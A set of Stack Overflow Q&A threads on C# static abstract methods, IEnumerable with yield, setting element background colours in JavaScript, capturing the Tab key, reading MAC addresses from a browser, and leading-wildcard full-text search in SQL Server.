A: Static methods cannot be inherited or overridden, and that is why they can't be abstract. Since static methods are defined on the type, not the instance, of a class, they must be called explicitly on that type. So when you want to call a method on a child class, you need to use its name to call it. This makes inheritance irrelevant.
Assume you could, for a moment, inherit static methods. Imagine this scenario:
public static class Base
{
public static virtual int GetNumber() { return 5; }
}
public static class Child1 : Base
{
public static override int GetNumber() { return 1; }
}
public static class Child2 : Base
{
public static override int GetNumber() { return 2; }
}
If you call Base.GetNumber(), which method would be called? Which value returned? It's pretty easy to see that without creating instances of objects, inheritance is rather hard. Abstract methods without inheritance are just methods that don't have a body, so can't be called.
A: Another respondent (McDowell) said that polymorphism only works for object instances. That should be qualified; there are languages that do treat classes as instances of a "Class" or "Metaclass" type. These languages do support polymorphism for both instance and class (static) methods.
C#, like Java and C++ before it, is not such a language; the static keyword is used explicitly to denote that the method is statically-bound rather than dynamic/virtual.
A: Static methods are not instantiated as such, they're just available without an object reference.
A call to a static method is done through the class name, not through an object reference, and the Intermediate Language (IL) code to call it will call the abstract method through the name of the class that defined it, not necessarily the name of the class you used.
Let me show an example.
With the following code:
public class A
{
public static void Test()
{
}
}
public class B : A
{
}
If you call B.Test, like this:
class Program
{
static void Main(string[] args)
{
B.Test();
}
}
Then the actual code inside the Main method is as follows:
.entrypoint
.maxstack 8
L0000: nop
L0001: call void ConsoleApplication1.A::Test()
L0006: nop
L0007: ret
As you can see, the call is made to A.Test, because it was the A class that defined it, and not to B.Test, even though you can write the code that way.
If you had class types, like in Delphi, where you can make a variable referring to a type and not an object, you would have more use for virtual and thus abstract static methods (and also constructors), but they aren't available and thus static calls are non-virtual in .NET.
I realize that the IL designers could allow the code to be compiled to call B.Test, and resolve the call at runtime, but it still wouldn't be virtual, as you would still have to write some kind of class name there.
Virtual methods, and thus abstract ones, are only useful when you're using a variable which, at runtime, can contain many different types of objects, and you thus want to call the right method for the current object you have in the variable. With static methods you need to go through a class name anyway, so the exact method to call is known at compile time because it can't and won't change.
Thus, virtual/abstract static methods are not available in .NET.
A: With .NET 6 / C# 10/next/preview you are able to do exactly that with "Static abstract members in interfaces".
(At the time of writing the code compiles successfully but some IDEs have problems highlighting the code)
SharpLab Demo
using System;
namespace StaticAbstractTesting
{
public interface ISomeAbstractInterface
{
public abstract static string CallMe();
}
public class MyClassA : ISomeAbstractInterface
{
static string ISomeAbstractInterface.CallMe()
{
return "You called ClassA";
}
}
public class MyClassB : ISomeAbstractInterface
{
static string ISomeAbstractInterface.CallMe()
{
return "You called ClassB";
}
}
public class Program
{
public static void Main(string[] args)
{
UseStaticClassMethod<MyClassA>();
UseStaticClassMethod<MyClassB>();
}
public static void UseStaticClassMethod<T>() where T : ISomeAbstractInterface
{
Console.WriteLine($"{typeof(T).Name}.CallMe() result: {T.CallMe()}");
}
}
}
Since this is a major change in the runtime, the resulting IL code also looks really clean, which means that this is not just syntactic sugar.
public static void UseStaticClassMethodSimple<T>() where T : ISomeAbstractInterface {
IL_0000: constrained. !!T
IL_0006: call string StaticAbstractTesting.ISomeAbstractInterface::CallMe()
IL_000b: call void [System.Console]System.Console::WriteLine(string)
IL_0010: ret
}
Resources:
*
*https://learn.microsoft.com/en-us/dotnet/core/compatibility/core-libraries/6.0/static-abstract-interface-methods
*https://github.com/dotnet/csharplang/issues/4436
A: Here is a situation where there is definitely a need for inheritance for static fields and methods:
abstract class Animal
{
protected static string[] legs;
static Animal() {
legs=new string[0];
}
public static void printLegs()
{
foreach (string leg in legs) {
print(leg);
}
}
}
class Human: Animal
{
static Human() {
legs=new string[] {"left leg", "right leg"};
}
}
class Dog: Animal
{
static Dog() {
legs=new string[] {"left foreleg", "right foreleg", "left hindleg", "right hindleg"};
}
}
public static void main() {
Dog.printLegs();
Human.printLegs();
}
//what is the output?
//does each subclass get its own copy of the array "legs"?
A: This question is 12 years old but it still needs to be given a better answer. As few noted in the comments and contrarily to what all answers pretend it would certainly make sense to have static abstract methods in C#. As philosopher Daniel Dennett put it, a failure of imagination is not an insight into necessity. There is a common mistake in not realizing that C# is not only an OOP language. A pure OOP perspective on a given concept leads to a restricted and in the current case misguided examination. Polymorphism is not only about subtying polymorphism: it also includes parametric polymorphism (aka generic programming) and C# has been supporting this for a long time now. Within this additional paradigm, abstract classes (and most types) are not only used to provide a type to instances. They can also be used as bounds for generic parameters; something that has been understood by users of certain languages (like for example Haskell, but also more recently Scala, Rust or Swift) for years.
In this context you may want to do something like this:
void Catch<TAnimal>() where TAnimal : Animal
{
string scientificName = TAnimal.ScientificName; // abstract static property
Console.WriteLine($"Let's catch some {scientificName}");
…
}
And here the capacity to express static members that can be specialized by subclasses totally makes sense!
Unfortunately C# does not allow abstract static members but I'd like to propose a pattern that can emulate them reasonably well. This pattern is not perfect (it imposes some restrictions on inheritance) but as far as I can tell it is typesafe.
The main idea is to associate an abstract companion class (here SpeciesFor<TAnimal>) to the one that should contain static abstract members (here Animal):
public abstract class SpeciesFor<TAnimal> where TAnimal : Animal
{
public static SpeciesFor<TAnimal> Instance { get { … } }
// abstract "static" members
public abstract string ScientificName { get; }
…
}
public abstract class Animal { … }
Now we would like to make this work:
void Catch<TAnimal>() where TAnimal : Animal
{
string scientificName = SpeciesFor<TAnimal>.Instance.ScientificName;
Console.WriteLine($"Let's catch some {scientificName}");
…
}
Of course we have two problems to solve:
*
*How do we make sure an implementer of a subclass of Animal provides a specific instance of SpeciesFor<TAnimal> to this subclass?
*How does the property SpeciesFor<TAnimal>.Instance retrieve this information?
Here is how we can solve 1:
public abstract class Animal<TSelf> where TSelf : Animal<TSelf>
{
private Animal(…) {}
public abstract class OfSpecies<TSpecies> : Animal<TSelf>
where TSpecies : SpeciesFor<TSelf>, new()
{
protected OfSpecies(…) : base(…) { }
}
…
}
By making the constructor of Animal<TSelf> private we make sure that all its subclasses are also subclasses of inner class Animal<TSelf>.OfSpecies<TSpecies>. So these subclasses must specify a TSpecies type that has a new() bound.
For 2 we can provide the following implementation:
public abstract class SpeciesFor<TAnimal> where TAnimal : Animal<TAnimal>
{
private static SpeciesFor<TAnimal> _instance;
public static SpeciesFor<TAnimal> Instance => _instance ??= MakeInstance();
private static SpeciesFor<TAnimal> MakeInstance()
{
Type t = typeof(TAnimal);
while (true)
{
if (t.IsConstructedGenericType
&& t.GetGenericTypeDefinition() == typeof(Animal<>.OfSpecies<>))
return (SpeciesFor<TAnimal>)Activator.CreateInstance(t.GenericTypeArguments[1]);
t = t.BaseType;
if (t == null)
throw new InvalidProgramException();
}
}
// abstract "static" members
public abstract string ScientificName { get; }
…
}
How do we know that the reflection code inside MakeInstance() never throws? As we've already said, almost all classes within the hierarchy of Animal<TSelf> are also subclasses of Animal<TSelf>.OfSpecies<TSpecies>. So we know that for these classes a specific TSpecies must be provided. This type is also necessarily constructible thanks to constraint : new(). But this still leaves out abstract types like Animal<Something> that have no associated species. Now we can convince ourself that the curiously recurring template pattern where TAnimal : Animal<TAnimal> makes it impossible to write SpeciesFor<Animal<Something>>.Instance as type Animal<Something> is never a subtype of Animal<Animal<Something>>.
Et voilà:
public class CatSpecies : SpeciesFor<Cat>
{
// overriden "static" members
public override string ScientificName => "Felis catus";
public override Cat CreateInVivoFromDnaTrappedInAmber() { … }
public override Cat Clone(Cat a) { … }
public override Cat Breed(Cat a1, Cat a2) { … }
}
public class Cat : Animal<Cat>.OfSpecies<CatSpecies>
{
// overriden members
public override string CuteName { get { … } }
}
public class DogSpecies : SpeciesFor<Dog>
{
// overriden "static" members
public override string ScientificName => "Canis lupus familiaris";
public override Dog CreateInVivoFromDnaTrappedInAmber() { … }
public override Dog Clone(Dog a) { … }
public override Dog Breed(Dog a1, Dog a2) { … }
}
public class Dog : Animal<Dog>.OfSpecies<DogSpecies>
{
// overriden members
public override string CuteName { get { … } }
}
public class Program
{
public static void Main()
{
ConductCrazyScientificExperimentsWith<Cat>();
ConductCrazyScientificExperimentsWith<Dog>();
ConductCrazyScientificExperimentsWith<Tyranosaurus>();
ConductCrazyScientificExperimentsWith<Wyvern>();
}
public static void ConductCrazyScientificExperimentsWith<TAnimal>()
where TAnimal : Animal<TAnimal>
{
// Look Ma! No animal instance polymorphism!
TAnimal a2039 = SpeciesFor<TAnimal>.Instance.CreateInVivoFromDnaTrappedInAmber();
TAnimal a2988 = SpeciesFor<TAnimal>.Instance.CreateInVivoFromDnaTrappedInAmber();
TAnimal a0400 = SpeciesFor<TAnimal>.Instance.Clone(a2988);
TAnimal a9477 = SpeciesFor<TAnimal>.Instance.Breed(a0400, a2039);
TAnimal a9404 = SpeciesFor<TAnimal>.Instance.Breed(a2988, a9477);
Console.WriteLine(
"The confederation of mad scientists is happy to announce the birth " +
$"of {a9404.CuteName}, our new {SpeciesFor<TAnimal>.Instance.ScientificName}.");
}
}
A limitation of this pattern is that it is not possible (as far as I can tell) to extend the class hierarchy in a satifying manner. For example we cannot introduce an intermediary Mammal class associated to a MammalClass companion. Another is that it does not work for static members in interfaces which would be more flexible than abstract classes.
A: The abstract methods are implicitly virtual. Abstract methods require an instance, but static methods do not have an instance. So, you can have a static method in an abstract class, it just cannot be static abstract (or abstract static).
A: It's available in C# 10 as a preview feature for now.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3284",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "208"
} |
Q: Can I have a method returning IEnumerator and use it in a foreach loop? I need to set the height of every textbox on my form, some of which are nested within other controls. I thought I could do something like this:
private static IEnumerator<TextBox> FindTextBoxes(Control rootControl)
{
foreach (Control control in rootControl.Controls)
{
if (control.Controls.Count > 0)
{
// Recursively search for any TextBoxes within each child control
foreach (TextBox textBox in FindTextBoxes(control))
{
yield return textBox;
}
}
TextBox textBox2 = control as TextBox;
if (textBox2 != null)
{
yield return textBox2;
}
}
}
Using it like this:
foreach(TextBox textBox in FindTextBoxes(this))
{
textBox.Height = height;
}
But of course the compiler spits its dummy, because foreach expects an IEnumerable rather than an IEnumerator.
Is there a way to do this without having to create a separate class with a GetEnumerator() method?
A: If you return IEnumerator, it will be a different enumerator object each time call that method (acting as though you reset the enumerator on each iteration). If you return IEnumerable then a foreach can enumerate based on the method with the yield statement.
A: As the compiler is telling you, you need to change your return type to IEnumerable. That is how the yield return syntax works.
A: Just to clarify
private static IEnumerator<TextBox> FindTextBoxes(Control rootControl)
Changes to
private static IEnumerable<TextBox> FindTextBoxes(Control rootControl)
That should be all :-)
A: // Generic function that gets all child controls of a certain type,
// returned in a List collection
private static List<T> GetChildTextBoxes<T>(Control ctrl) where T : Control{
List<T> tbs = new List<T>();
foreach (Control c in ctrl.Controls) {
// If c is of type T, add it to the collection
if (c is T) {
tbs.Add((T)c);
}
}
return tbs;
}
private static void SetChildTextBoxesHeight(Control ctrl, int height) {
foreach (TextBox t in GetChildTextBoxes<TextBox>(ctrl)) {
t.Height = height;
}
}
A: If you are given an enumerator, and need to use it in a for-each loop, you could use the following to wrap it:
static public class enumerationHelper
{
public class enumeratorHolder<T>
{
private T theEnumerator;
public T GetEnumerator() { return theEnumerator; }
public enumeratorHolder(T newEnumerator) { theEnumerator = newEnumerator;}
}
static enumeratorHolder<T> toEnumerable<T>(T theEnumerator) { return new enumeratorHolder<T>(theEnumerator); }
private class IEnumeratorHolder<T>:IEnumerable<T>
{
private IEnumerator<T> theEnumerator;
public IEnumerator<T> GetEnumerator() { return theEnumerator; }
System.Collections.IEnumerator System.Collections.IEnumerable.GetEnumerator() { return theEnumerator; }
public IEnumeratorHolder(IEnumerator<T> newEnumerator) { theEnumerator = newEnumerator; }
}
static IEnumerable<T> toEnumerable<T>(IEnumerator<T> theEnumerator) { return new IEnumeratorHolder<T>(theEnumerator); }
}
The toEnumerable method will accept anything that c# or vb would regard an acceptable return type from GetEnumerator, and return something that can be used in foreach. If the parameter is an IEnumerator<> the response will be an IEnumerable<T>, though calling GetEnumerator on it once will likely yield bad results.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3315",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: How to set background color of HTML element using css properties in JavaScript How can I set the background color of an HTML element using css in JavaScript?
A: Add this script element to your body element:
<body>
<script type="text/javascript">
document.body.style.backgroundColor = "#AAAAAA";
</script>
</body>
A:
var element = document.getElementById('element');
element.onclick = function() {
element.classList.add('backGroundColor');
setTimeout(function() {
element.classList.remove('backGroundColor');
}, 2000);
};
.backGroundColor {
background-color: green;
}
<div id="element">Click Me</div>
A: You can try this
var element = document.getElementById('element_id');
element.style.backgroundColor = "color or color_code";
Example.
var element = document.getElementById('firstname');
element.style.backgroundColor = "green";//Or #ff55ff
JSFIDDLE
A: KISS Answer:
document.getElementById('element').style.background = '#DD00DD';
A: You can do it with JQuery:
$(".class").css("background","yellow");
A: You might find your code is more maintainable if you keep all your styles, etc. in CSS and just set / unset class names in JavaScript.
Your CSS would obviously be something like:
.highlight {
background:#ff00aa;
}
Then in JavaScript:
element.className = element.className === 'highlight' ? '' : 'highlight';
A: You can use:
<script type="text/javascript">
Window.body.style.backgroundColor = "#5a5a5a";
</script>
A: $("body").css("background","green"); //jQuery
document.body.style.backgroundColor = "green"; //javascript
so many ways are there I think it is very easy and simple
Demo On Plunker
A: $('#ID / .Class').css('background-color', '#FF6600');
By using jquery we can target the element's class or Id to apply css background or any other stylings
A: var element = document.getElementById('element');
element.style.background = '#FF00AA';
A: Or, using a little jQuery:
$('#fieldID').css('background-color', '#FF6600');
A: In general, CSS properties are converted to JavaScript by making them camelCase without any dashes. So background-color becomes backgroundColor.
function setColor(element, color)
{
element.style.backgroundColor = color;
}
// where el is the concerned element
var el = document.getElementById('elementId');
setColor(el, 'green');
A: you can use
$('#elementID').css('background-color', '#C0C0C0');
A: Changing CSS of a HTMLElement
You can change most of the CSS properties with JavaScript, use this statement:
document.querySelector(<selector>).style[<property>] = <new style>
where <selector>, <property>, <new style> are all String objects.
Usually, the style property will have the same name as the actual name used in CSS. But whenever there is more that one word, it will be camel case: for example background-color is changed with backgroundColor.
The following statement will set the background of #container to the color red:
documentquerySelector('#container').style.background = 'red'
Here's a quick demo changing the color of the box every 0.5s:
colors = ['rosybrown', 'cornflowerblue', 'pink', 'lightblue', 'lemonchiffon', 'lightgrey', 'lightcoral', 'blueviolet', 'firebrick', 'fuchsia', 'lightgreen', 'red', 'purple', 'cyan']
let i = 0
setInterval(() => {
const random = Math.floor(Math.random()*colors.length)
document.querySelector('.box').style.background = colors[random];
}, 500)
.box {
width: 100px;
height: 100px;
}
<div class="box"></div>
Changing CSS of multiple HTMLElement
Imagine you would like to apply CSS styles to more than one element, for example, make the background color of all elements with the class name box lightgreen. Then you can:
*
*select the elements with .querySelectorAll and unwrap them in an object Array with the destructuring syntax:
const elements = [...document.querySelectorAll('.box')]
*loop over the array with .forEach and apply the change to each element:
elements.forEach(element => element.style.background = 'lightgreen')
Here is the demo:
const elements = [...document.querySelectorAll('.box')]
elements.forEach(element => element.style.background = 'lightgreen')
.box {
height: 100px;
width: 100px;
display: inline-block;
margin: 10px;
}
<div class="box"></div>
<div class="box"></div>
<div class="box"></div>
<div class="box"></div>
Another method
If you want to change multiple style properties of an element more than once you may consider using another method: link this element to another class instead.
Assuming you can prepare the styles beforehand in CSS you can toggle classes by accessing the classList of the element and calling the toggle function:
document.querySelector('.box').classList.toggle('orange')
.box {
width: 100px;
height: 100px;
}
.orange {
background: orange;
}
<div class='box'></div>
List of CSS properties in JavaScript
Here is the complete list:
alignContent
alignItems
alignSelf
animation
animationDelay
animationDirection
animationDuration
animationFillMode
animationIterationCount
animationName
animationTimingFunction
animationPlayState
background
backgroundAttachment
backgroundColor
backgroundImage
backgroundPosition
backgroundRepeat
backgroundClip
backgroundOrigin
backgroundSize</a></td>
backfaceVisibility
borderBottom
borderBottomColor
borderBottomLeftRadius
borderBottomRightRadius
borderBottomStyle
borderBottomWidth
borderCollapse
borderColor
borderImage
borderImageOutset
borderImageRepeat
borderImageSlice
borderImageSource
borderImageWidth
borderLeft
borderLeftColor
borderLeftStyle
borderLeftWidth
borderRadius
borderRight
borderRightColor
borderRightStyle
borderRightWidth
borderSpacing
borderStyle
borderTop
borderTopColor
borderTopLeftRadius
borderTopRightRadius
borderTopStyle
borderTopWidth
borderWidth
bottom
boxShadow
boxSizing
captionSide
clear
clip
color
columnCount
columnFill
columnGap
columnRule
columnRuleColor
columnRuleStyle
columnRuleWidth
columns
columnSpan
columnWidth
counterIncrement
counterReset
cursor
direction
display
emptyCells
filter
flex
flexBasis
flexDirection
flexFlow
flexGrow
flexShrink
flexWrap
content
fontStretch
hangingPunctuation
height
hyphens
icon
imageOrientation
navDown
navIndex
navLeft
navRight
navUp>
cssFloat
font
fontFamily
fontSize
fontStyle
fontVariant
fontWeight
fontSizeAdjust
justifyContent
left
letterSpacing
lineHeight
listStyle
listStyleImage
listStylePosition
listStyleType
margin
marginBottom
marginLeft
marginRight
marginTop
maxHeight
maxWidth
minHeight
minWidth
opacity
order
orphans
outline
outlineColor
outlineOffset
outlineStyle
outlineWidth
overflow
overflowX
overflowY
padding
paddingBottom
paddingLeft
paddingRight
paddingTop
pageBreakAfter
pageBreakBefore
pageBreakInside
perspective
perspectiveOrigin
position
quotes
resize
right
tableLayout
tabSize
textAlign
textAlignLast
textDecoration
textDecorationColor
textDecorationLine
textDecorationStyle
textIndent
textOverflow
textShadow
textTransform
textJustify
top
transform
transformOrigin
transformStyle
transition
transitionProperty
transitionDuration
transitionTimingFunction
transitionDelay
unicodeBidi
userSelect
verticalAlign
visibility
voiceBalance
voiceDuration
voicePitch
voicePitchRange
voiceRate
voiceStress
voiceVolume
whiteSpace
width
wordBreak
wordSpacing
wordWrap
widows
writingMode
zIndex
A: Javascript:
document.getElementById("ID").style.background = "colorName"; //JS ID
document.getElementsByClassName("ClassName")[0].style.background = "colorName"; //JS Class
Jquery:
$('#ID/.className').css("background","colorName") // One style
$('#ID/.className').css({"background":"colorName","color":"colorname"}); //Multiple style
A: A simple js can solve this:
document.getElementById("idName").style.background = "blue";
A: $(".class")[0].style.background = "blue";
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3319",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "129"
} |
Q: Capturing TAB key in text box I would like to be able to use the Tab key within a text box to tab over four spaces. The way it is now, the Tab key jumps my cursor to the next input.
Is there some JavaScript that will capture the Tab key in the text box before it bubbles up to the UI?
I understand some browsers (i.e. FireFox) may not allow this. How about a custom key-combo like Shift+Tab, or Ctrl+Q?
A: I would advise against changing the default behaviour of a key. I do as much as possible without touching a mouse, so if you make my tab key not move to the next field on a form I will be very aggravated.
A shortcut key could be useful however, especially with large code blocks and nesting. Shift-TAB is a bad option because that normally takes me to the previous field on a form. Maybe a new button on the WMD editor to insert a code-TAB, with a shortcut key, would be possible?
A: In Chrome on the Mac, alt-tab inserts a tab character into a <textarea> field.
Here’s one: . Wee!
A: there is a problem in best answer given by ScottKoon
here is it
} else if(el.attachEvent ) {
myInput.attachEvent('onkeydown',this.keyHandler); /* damn IE hack */
}
Should be
} else if(myInput.attachEvent ) {
myInput.attachEvent('onkeydown',this.keyHandler); /* damn IE hack */
}
Due to this it didn't work in IE.
Hoping that ScottKoon will update code
A: I'd rather tab indentation not work than breaking tabbing between form items.
If you want to indent to put in code in the Markdown box, use Ctrl+K (or ⌘K on a Mac).
In terms of actually stopping the action, jQuery (which Stack Overflow uses) will stop an event from bubbling when you return false from an event callback. This makes life easier for working with multiple browsers.
A: The previous answer is fine, but I'm one of those guys that's firmly against mixing behavior with presentation (putting JavaScript in my HTML) so I prefer to put my event handling logic in my JavaScript files. Additionally, not all browsers implement event (or e) the same way. You may want to do a check prior to running any logic:
document.onkeydown = TabExample;
function TabExample(evt) {
var evt = (evt) ? evt : ((event) ? event : null);
var tabKey = 9;
if(evt.keyCode == tabKey) {
// do work
}
}
A: Even if you capture the keydown/keyup event, those are the only events that the tab key fires, you still need some way to prevent the default action, moving to the next item in the tab order, from occurring.
In Firefox you can call the preventDefault() method on the event object passed to your event handler. In IE, you have to return false from the event handle. The JQuery library provides a preventDefault method on its event object that works in IE and FF.
<body>
<input type="text" id="myInput">
<script type="text/javascript">
var myInput = document.getElementById("myInput");
if(myInput.addEventListener ) {
myInput.addEventListener('keydown',this.keyHandler,false);
} else if(myInput.attachEvent ) {
myInput.attachEvent('onkeydown',this.keyHandler); /* damn IE hack */
}
function keyHandler(e) {
var TABKEY = 9;
if(e.keyCode == TABKEY) {
this.value += " ";
if(e.preventDefault) {
e.preventDefault();
}
return false;
}
}
</script>
</body>
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3362",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "109"
} |
Q: MAC addresses in JavaScript I know that we can get the MAC address of a user via IE (ActiveX objects).
Is there a way to obtain a user's MAC address using JavaScript?
A: I concur with all the previous answers that it would be a privacy/security vulnerability if you would be able to do this directly from Javascript. There are two things I can think of:
*
*Using Java (with a signed applet)
*Using signed Javascript, which in FF (and Mozilla in general) gets higher privileges than normal JS (but it is fairly complicated to set up)
A: If this is for an intranet application and all of the clients use DHCP, you can query the DHCP server for the MAC address for a given IP address.
A: Nope. The reason ActiveX can do it is because ActiveX is a little application that runs on the client's machine.
I would imagine access to such information via JavaScript would be a security vulnerability.
A: The quick and simple answer is No.
Javascript is quite a high level language and does not have access to this sort of information.
A: i was looking for the same problem and stumbled upon the following code.
How to get Client MAC address(Web):
To get the client MAC address only way we can rely on JavaScript and Active X control of Microsoft.It is only work in IE if Active X enable for IE. As the ActiveXObject is not available with the Firefox, its not working with the firefox and is working fine in IE.
This script is for IE only:
function showMacAddress() {
var obj = new ActiveXObject("WbemScripting.SWbemLocator");
var s = obj.ConnectServer(".");
var properties = s.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration");
var e = new Enumerator(properties);
var output;
output = '<table border="0" cellPadding="5px" cellSpacing="1px" bgColor="#CCCCCC">';
output = output + '<tr bgColor="#EAEAEA"><td>Caption</td><td>MACAddress</td></tr>';
while (!e.atEnd()) {
e.moveNext();
var p = e.item();
if (!p) continue;
output = output + '<tr bgColor="#FFFFFF">';
output = output + '<td>' + p.Caption; +'</td>';
output = output + '<td>' + p.MACAddress + '</td>';
output = output + '</tr>';
}
output = output + '</table>';
document.getElementById("box").innerHTML = output;
}
showMacAddress();
<div id='box'></div>
A: No you cannot get the MAC address in JavaScript, mainly because the MAC address uniquely identifies the running computer so it would be a security vulnerability.
Now if all you need is a unique identifier, I suggest you create one yourself using some cryptographic algorithm and store it in a cookie.
If you really need to know the MAC address of the computer AND you are developing for internal applications, then I suggest you use an external component to do that: ActiveX for IE, XPCOM for Firefox (installed as an extension).
A: I know I am really late to this party. And although the answer is still no. I found a way to generate and store a unique id that helps to keep track of a user while they navigate the site.
When the user signs up, I then have a full record of what pages he visited before he signed up. I also store this id in the user table for historical reference.
This is also handy when you're looking for dubious activity. For example, a user that has created multiple accounts. I should note that this is on a financial transaction site and the data is only used internally. It does really help to cut down on fraudulent and duped accounts. There is a lot that can be done with localStorage and this method, but I will keep this short to not give anyone nefarious ideas.
1- Generate a random string. If you generate a 40 char string, you don't really have too much to worry about as far as them colliding. We're not looking to send a rocket to Mars here.
I use a small PHP function to generate a 40 char string. I use Ajax to call this function and retrieve the result.
function genrandstr($length=NULL) {
if($length == NULL){ $length = 30; }
$characters =
'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString;
}
localStorage.setItem('id', id) to add to localStorage
(let) or (var) id = localStorage.getItem('id') to read from localStorage
2- Using cookies, you can store this id in a cookie.
3- LocalStorage is your friend. Store the same id in LocalStorage and chances are, you will always have that id to look at.
With an id stored in LocalStorage, your user can delete cookies and you'd still be able to recognize an old visitor by this id.
If the user deletes all their data, then you're SOL and start all over again when they revisit.
Have Fun
A: No you can't obtain a user's MAC address using JavaScript in another way, just by using active X op for Microsoft in IE browser
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3385",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "124"
} |
Q: How do you get leading wildcard full-text searches to work in SQL Server? Note: I am using SQL's Full-text search capabilities, CONTAINS clauses and all - the * is the wildcard in full-text, % is for LIKE clauses only.
I've read in several places now that "leading wildcard" searches (e.g. using "*overflow" to match "stackoverflow") is not supported in MS SQL. I'm considering using a CLR function to add regex matching, but I'm curious to see what other solutions people might have.
More Info: You can add the asterisk only at the end of the word or phrase. - along with my empirical experience: When matching "myvalue", "my*" works, but "(asterisk)value" returns no match, when doing a query as simple as:
SELECT * FROM TABLENAME WHERE CONTAINS(TextColumn, '"*searchterm"');
Thus, my need for a workaround. I'm only using search in my site on an actual search page - so it needs to work basically the same way that Google works (in the eyes on a Joe Sixpack-type user). Not nearly as complicated, but this sort of match really shouldn't fail.
A: To perhaps add clarity to this thread, from my testing on 2008 R2, Franjo is correct above. When dealing with full text searching, at least when using the CONTAINS phrase, you cannot use a leading , only a trailing functionally. * is the wildcard, not % in full text.
Some have suggested that * is ignored. That does not seem to be the case, my results seem to show that the trailing * functionality does work. I think leading * are ignored by the engine.
My added problem however is that the same query, with a trailing *, that uses full text with wildcards worked relatively fast on 2005(20 seconds), and slowed to 12 minutes after migrating the db to 2008 R2. It seems at least one other user had similar results and he started a forum post which I added to... FREETEXT works fast still, but something "seems" to have changed with the way 2008 processes trailing * in CONTAINS. They give all sorts of warnings in the Upgrade Advisor that they "improved" FULL TEXT so your code may break, but unfortunately they do not give you any specific warnings about certain deprecated code etc. ...just a disclaimer that they changed it, use at your own risk.
http://social.msdn.microsoft.com/Forums/ar-SA/sqlsearch/thread/7e45b7e4-2061-4c89-af68-febd668f346c
Maybe, this is the closest MS hit related to these issues... http://msdn.microsoft.com/en-us/library/ms143709.aspx
A: Note: this was the answer I submitted for the original version #1 of the question before the CONTAINS keyword was introduced in revision #2. It's still factually accurate.
The wildcard character in SQL Server is the % sign and it works just fine, leading, trailing or otherwise.
That said, if you're going to be doing any kind of serious full text searching then I'd consider utilising the Full Text Index capabilities. Using % and _ wild cards will cause your database to take a serious performance hit.
A: One thing worth keeping in mind is that leading wildcard queries come at a significant performance premium, compared to other wildcard usages.
A: Workaround only for leading wildcard:
*
*store the text reversed in a different field (or in materialised view)
*create a full text index on this column
*find the reversed text with an *
SELECT *
FROM TABLENAME
WHERE CONTAINS(TextColumnREV, '"mrethcraes*"');
Of course there are many drawbacks, just for quick workaround...
Not to mention CONTAINSTABLE...
A: The problem with leading Wildcards: They cannot be indexed, hence you're doing a full table scan.
A: It is possible to use the wildcard "*" at the end of the word or phrase (prefix search).
For example, this query will find all "datab", "database", "databases" ...
SELECT * FROM SomeTable WHERE CONTAINS(ColumnName, '"datab*"')
But, unforutnately, it is not possible to search with leading wildcard.
For example, this query will not find "database"
SELECT * FROM SomeTable WHERE CONTAINS(ColumnName, '"*abase"')
A: Just FYI, Google does not do any substring searches or truncation, right or left. They have a wildcard character * to find unknown words in a phrase, but not a word.
Google, along with most full-text search engines, sets up an inverted index based on the alphabetical order of words, with links to their source documents. Binary search is wicked fast, even for huge indexes. But it's really really hard to do a left-truncation in this case, because it loses the advantage of the index.
A: As a parameter in a stored procedure you can use it as:
ALTER procedure [dbo].[uspLkp_DrugProductSelectAllByName]
(
@PROPRIETARY_NAME varchar(10)
)
as
set nocount on
declare @PROPRIETARY_NAME2 varchar(10) = '"' + @PROPRIETARY_NAME + '*"'
select ldp.*, lkp.DRUG_PKG_ID
from Lkp_DrugProduct ldp
left outer join Lkp_DrugPackage lkp on ldp.DRUG_PROD_ID = lkp.DRUG_PROD_ID
where contains(ldp.PROPRIETARY_NAME, @PROPRIETARY_NAME2)
A: When it comes to full-text searching, for my money nothing beats Lucene. There is a .Net port available that is compatible with indexes created with the Java version.
There's a little work involved in that you have to create/maintain the indexes, but the search speed is fantastic and you can create all sorts of interesting queries. Even indexing speed is pretty good - we just completely rebuild our indexes once a day and don't worry about updating them.
As an example, this search functionality is powered by Lucene.Net.
A: Perhaps the following link will provide the final answer to this use of wildcards: Performing FTS Wildcard Searches.
Note the passage that states: "However, if you specify “Chain” or “Chain”, you will not get the expected result. The asterisk will be considered as a normal punctuation mark not a wildcard character. "
A: If you have access to the list of words of the full text search engine, you could do a 'like' search on this list and match the database with the words found, e.g. a table 'words' with following words:
pie
applepie
spies
cherrypie
dog
cat
To match all words containing 'pie' in this database on a fts table 'full_text' with field 'text':
to-match <- SELECT word FROM words WHERE word LIKE '%pie%'
matcher = ""
a = ""
foreach(m, to-match) {
matcher += a
matcher += m
a = " OR "
}
SELECT text FROM full_text WHERE text MATCH matcher
A: % Matches any number of characters
_ Matches a single character
I've never used Full-Text indexing but you can accomplish rather complex and fast search queries with simply using the build in T-SQL string functions.
A: From SQL Server Books Online:
To write full-text queries in
Microsoft SQL Server 2005, you must
learn how to use the CONTAINS and
FREETEXT Transact-SQL predicates, and
the CONTAINSTABLE and FREETEXTTABLE
rowset-valued functions.
That means all of the queries written above with the % and _ are not valid full text queries.
Here is a sample of what a query looks like when calling the CONTAINSTABLE function.
SELECT RANK , * FROM TableName ,
CONTAINSTABLE (TableName, *, '
"*WildCard" ') searchTable WHERE
[KEY] = TableName.pk ORDER BY
searchTable.RANK DESC
In order for the CONTAINSTABLE function to know that I'm using a wildcard search, I have to wrap it in double quotes. I can use the wildcard character * at the beginning or ending. There are a lot of other things you can do when you're building the search string for the CONTAINSTABLE function. You can search for a word near another word, search for inflectional words (drive = drives, drove, driving, and driven), and search for synonym of another word (metal can have synonyms such as aluminum and steel).
